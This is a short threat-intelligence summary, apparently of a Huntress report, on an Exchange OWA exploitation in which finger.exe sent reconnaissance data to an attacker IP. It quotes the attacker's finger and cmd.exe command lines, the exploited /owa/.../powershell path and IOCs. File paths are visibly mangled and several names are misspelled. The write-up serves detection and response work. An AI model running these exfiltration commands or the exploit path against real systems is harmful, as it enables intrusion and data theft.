Threat Research

Threat Intel Accelerates Detection and Response | Huntress

Securonix

Huntress identified novel indicators of an attack where finger.exe exfiltrated reconnaissance data from an endpoint, linked to a persistent IP and web server/log artifacts. The findings illustrate rapid detection and response when threat intel, Windows Defender, and server logs are correlated, and connect to previously reported OWASRRF exploit patterns described by Unit42. #finger.exe #OWASRRF #Unit42 #Huntress #MSExchange

Keypoints

  • Huntress detected an operation using finger.exe to exfiltrate reconnaissance data from an endpoint (Nov 2023).
  • The activity involved multiple command lines, including base64-encoded PowerShell commands and a non-encoded command, with Windows Defender remediating all four commands.
  • The decoded first command was “finger [email protected],” followed by further obfuscated PowerShell activity and a final “C:WindowsSystem32cmd.exe /c finger [email protected]” command.
  • Indicators traced through Windows Defender events, MSExchange CmdletLogs, and web server logs, forming an artifact constellation that matched OWASRRF-related activity.
  • Artifacts included a POST to /owa/[email protected]/powershell, the 185.56.83.82 IP, and specific User-Agent strings in web logs.
  • The incident concluded with remediation actions and a recommendation to update MSExchange, demonstrating rapid, intel-led detection and response.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The actor exploited a public-facing Exchange-like path with POST requests to the /owa/[email protected]/powershell page. Quote: ‘POST requests with status code of 200, to the /owa/[email protected]/powershell page’
  • [T1059.001] PowerShell – Several commands were executed as base64-encoded PowerShell scripts, including an encoded PowerShell sequence leading to further commands. Quote: ‘three of which were base64-encoded PowerShell commands’
  • [T1059.003] Windows Command Shell – The final executed command used cmd.exe: ‘C:WindowsSystem32cmd.exe /c finger [email protected]
  • [T1078] Valid Accounts – The threat actor reportedly had to authenticate to the server prior to exploitation, per Unit42’s threat brief. Quote: ‘the threat actor had to first authenticate to the server prior to exploitation’

Indicators of Compromise

  • [IP Address] 185.56.83.82 – Source IP address for POST requests to the web server, and destination IP address for finger.exe commands
  • [File path] C:WindowsSystem32winevtLogsMSExchange Management.evtx – Event Log file containing strings like “System.Diagnostics”, “w3wp#MSExchangePowerShellAppPool”, and “ProcessStartInfo Arguments”
  • [File path] C:inetpubLogsLogFilesW3SCV1u_ex240112.log – Web server log file with POST requests to /owa/[email protected]/powershell and related User-Agent
  • [URL] /owa/[email protected]/powershell – Web path used to trigger PowerShell activity
  • [User-Agent] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36 – User-Agent observed in web server logs
  • [File name] finger.exe – The executable used in the malicious sequence
  • [Command] finger [email protected] – Final command observed in the sequence

Read more: https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response